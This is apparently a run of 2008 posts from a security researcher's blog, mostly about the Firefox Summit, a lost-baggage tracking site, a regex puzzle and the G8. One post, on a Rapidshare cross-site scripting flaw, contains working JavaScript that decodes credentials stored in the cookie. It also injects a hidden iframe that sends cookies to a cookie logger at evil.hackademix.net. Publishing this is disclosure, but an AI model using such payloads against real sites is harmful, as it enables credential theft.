hackademix.net

As you’ve probably heard, the Firefox Summit 2008, albeit great for meeting face to face people I only knew through IRC or Bugzilla, has been quite challenging:

1. Besieged by bears
2. Cut away from the rest of the world by a crash bug in the Whistler-Vancouver communication module
3. Lost in the dark because of a truck-based DOS attack

We must all thank Dan Portillo for the (much) good of the Summit he masterly organized and the great job he made in working around the issues listed above, but on the other hand they might have been prevented perhaps by choosing a less hazardous place, since “Whistler” was the code-name for Microsoft Windows XP…

However, when yesterday night, after a 36 hours trip, I was finally back in Palermo believing it was all over, I went to get back my baggage — including most of my t-shirts, 3 pants, 9 bottles of maple syrup for my relatives and friends — but… it obviously wasn’t there. OK, I should have expected some problems since I packed also one leg of Wladimir Palant’s, which I had to smoke (on pure maple wood) the day of the power outage, before it started smelling inside my useless fridge.
After waiting about one hour because nobody in the airport could say if the unloading operations were done or not yet (what about implementing a callback architecture or a notification bus?), I had to formally claim it lost and was given a link to a website for tracking the baggage recovery process.

So this morning I tried submitting this form, but I got redirected to a page showing the following error message:

Il sistema non può indviduare* una lima valida per la vostra entrata.

For those who don’t speak Italian (like the author this disturbing text, I hope), this sounds like

The system cannot find a rasp suitable for your entrance.

As you can imagine, I was quite glad the system couldn’t ;)
Nonetheless, I still needed to know about the destiny of my baggage, so I retried on a clean profile: same result!
In the end I reluctantly switched the rendering engine through the IE Tab extension, and the system finally decided to be more collaborative: it reported there was no available tracking info yet, but at least it stopped threatening “my entrance” with steel tools.

At that point I checked all the browsers I’ve got at hand, with the following results:

• Gecko-based: RASP
• IE: OK
• Linx: RASP
• Opera: OK
• Safari: RASP

Before you ask, yes I tried to fake my headers via the User Agent Switcher extension.
Any clue?

* this misspelling seems even to rule out a machine translation with no human intervention

You know, looks like the Firefox Summit 2008 is going to have a dramatic epilogue.
I’ve been sitting next to AdBlock Plus’ author all this afternoon, attending a couple of security-related sessions, and now I’m getting dangerously hungry…
Want to save your favourite adblocker? Try to file a bug depending on this one.

As nktpro graciously told us, the latest of several XSS vulnerabilities affecting Rapidshare is still unpatched, one month after it had been reported to the site owners.
But what can you expect by people who stores both your username and password inside your cookie?
Yes, check it by yourself: a Rapidshare cookie is something like user=12345-%36%37%38%39%30.
In Javascript,
cookie = "username=" + login + "-" + pwd.replace(/./g, function(s) "%" + (s.charCodeAt(0).toString(16)))

Therefore, for a given cookie, access credentials are just
var [login, pwd] = cookie.replace(/.*=/,'').split("-"), pwd = unescape(pwd);

This means that if I embed the following code on this blog post, or even better on the FlashGot homepage, visited by thousands of Rapidshare users, I own an insane lot of accounts in a blink:

var injection = "<script>(" + (function() {
new Image().src = "http://evil.hackademix.net/cookielogger/rapidshare/?c=" +
escape(document.cookie);
}) + ")()</scr" + "ipt>"
var iframe = document.body.appendChild(document.createElement("iframe"));
iframe.style.visibility = "hidden";
iframe.src = "http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22" +
encodeURIComponent(injection);

But luckily, no Rapidshare user would ever visit those shady p0rn/w4r3z sites… ;)

Update

Fixed on 6 Aug 2008.

OK, Dustin Diaz (via Paul O’Shannessy) managed to delay my lunch by 30 secs.

var arr = ['a', 'b', 'c', 'c', 'd','e', 'e',
'e', 'e', 'e', 'f', 'e', 'f', 'e',
'f', 'a', 'a', 'a', 'f', 'f', 'f'];
var solution='a b c c d e e <span>e e e</span> f e f e f a a <span>a</span> f f <span>f</span>';
var won = arr.join(' ').replace(/((\w)\s\2\s)((?:\2\s?)+)(?=\s|$)/g, '$1<span>$3</span>') == solution;

Thanks to the wonderful interactive environment of Firefox’s “Error Console” (formerly known as JavaScript Console), my pasta didn’t get too cold :)

So the Hokkaido G8 has food security, climate changes and oil prices in a prominent place of its agenda.

Bush has made accountability a major theme for this year’s G8 meetings, arguing that “we need people who not only make promises, but write checks, for the sake of human rights and human dignity, and for the sake of peace.” The G8 includes Britain, Canada, France, Germany, Italy, Japan, Russia and the United States.

G8 leaders are expected to address an array of political, security and economic issues when they meet for three days. “We expect that they will discuss a broad range of issues, including development, Africa, food security, trade and investment policy, energy security, climate change and issues relating to the global economy, including oil prices.

Obviously, we expect the very same people who became insanely rich thanks to these “issues” ¹ to clean up their profitable mess and save the world.

We expect politicians whose career and position is entirely built upon terror to fight it.
We expect governments driven by ruthless corporate interests to regulate for a planet-sustainable economy, which may require profit margin reductions or even degrowth ².
We expect oil companies, mercenary armies, reconstruction contractors and weapon manufacturers, which rather than bribing the elected people representatives like they used to do in the past, nowadays have their executives directly placed in key government roles as an obscene parody of democracy, to shoot themselves in their feet.

Just like expecting anti-virus vendors to push technologies and approaches making our information systems really safer, or Microsoft to promote open (web) standards…

Notes